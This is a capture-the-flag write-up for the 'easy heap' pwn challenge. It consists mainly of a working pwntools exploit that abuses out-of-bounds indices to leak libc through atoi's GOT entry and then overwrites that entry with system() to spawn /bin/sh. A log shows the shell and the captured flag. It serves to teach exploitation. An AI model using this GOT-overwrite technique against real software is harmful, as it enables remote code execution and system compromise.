Rating:

## === easy heap (Pwn: 44 Solves / 100 pt) ===

```
I use the following address:

0x804af80: 0x0804b000 0x00000002 0x00000060 0x00000014
^^^^^^^^^^^^
  (index = -72)
```

```
from pwn import *

#context(os='linux', arch='i386')
#context.log_level = 'debug'

# Target binary and libc selection.  Passing a single argument "r" makes the
# script talk to the remote service and use the supplied libc copy; with no
# argument the binary is run locally and pwntools' libc lookup is used.
# (`sys` is not imported explicitly here; it is re-exported by `from pwn import *`.)
BINARY = './easy_heap'
elf = ELF(BINARY)

# Address of atoi's GOT slot in the (non-PIE) binary.
atoi_got_addr = elf.got['atoi']

remote_mode = len(sys.argv) > 1 and sys.argv[1] == 'r'
if remote_mode:
    s = remote("easyheap.acebear.site", 3002)
    libc = ELF("./easyheap_libc.so.6")
else:
    s = process(BINARY)
    libc = elf.libc

def Create(index, name):
    """Menu option 1: create entry `index` with the given `name`.

    Every answer, including the name, is newline-terminated via `sendline`.
    """
    dialogue = (
        ("Your choice: ", "1"),
        ("Index: ", str(index)),
        ("Input this name: ", name),
    )
    for prompt, answer in dialogue:
        s.recvuntil(prompt)
        s.sendline(answer)

def Edit(index, name):
    """Menu option 2: overwrite the name of entry `index`.

    The choice and index are newline-terminated; the new name itself is
    written raw with `send` (no trailing newline), since it carries packed
    binary data.
    """
    for prompt, answer in (("Your choice: ", "2"), ("Index: ", str(index))):
        s.recvuntil(prompt)
        s.sendline(answer)
    s.recvuntil("Input new name: ")
    s.send(name)

def Delete(index):
    """Menu option 3: free entry `index`."""
    for prompt, answer in (("Your choice: ", "3"), ("Index: ", str(index))):
        s.recvuntil(prompt)
        s.sendline(answer)

def Show(index):
    """Menu option 4: ask the program to print entry `index`.

    The caller reads the program's reply from `s` afterwards.
    """
    for prompt, answer in (("Your choice: ", "4"), ("Index: ", str(index))):
        s.recvuntil(prompt)
        s.sendline(answer)

# Exploit flow (Python 2 script; `s`, `elf`, `libc` and the menu helpers are
# defined above).

# Answer the name/age prompts shown before the menu appears.
s.recvuntil("Give me your name: ")
s.sendline("1111")
s.recvuntil("Your age: ")
s.sendline("2222")

# One entry is created and freed before the out-of-bounds indices are used.
Create(1, "AAAA")
Delete(1)

# Write atoi's GOT address into slot -72 (the 0x804af80 location noted above),
# then Show(-40) prints a buffer from which atoi's resolved address is taken
# at offset 0x12.  libc base and system() are derived from that leak.
Edit(-72, p32(atoi_got_addr))
Show(-40)
leak = s.recv(0x1c)
atoi_addr = u32(leak[0x12:0x16])
libc_base_addr = atoi_addr - libc.symbols['atoi']
system_addr = libc_base_addr + libc.symbols['system']

for label, value in (("atoi_addr", atoi_addr),
                     ("libc_base_addr", libc_base_addr),
                     ("system_addr", system_addr)):
    print "%s = %s" % (label, hex(value))

# Overwrite atoi's GOT entry with system().  This write is only possible
# because the GOT is writable (Partial RELRO, per the checksec output below);
# Full RELRO would make it read-only.
Edit(-72, p32(atoi_got_addr))
Edit(-40, p32(system_addr))

# The next menu input now goes to system() instead of atoi().
s.recvuntil("Your choice: ")
s.sendline("/bin/sh")

s.interactive()
```

```
root@kali:# python exploit.py r
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Opening connection to easyheap.acebear.site on port 3002: Done
[*] 'Pwn_easy_heap/easyheap_libc.so.6'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
atoi_addr = 0xf7e37050
libc_base_addr = 0xf7e0a000
system_addr = 0xf7e44940
[*] Switching to interactive mode
$ id
uid=1000(easy_heap) gid=1000(easy_heap) groups=1000(easy_heap)
$ cd /home/easy_heap
$ cat flag
AceBear{m4yb3_h34p_i5_3a5y_f0r_y0u}
```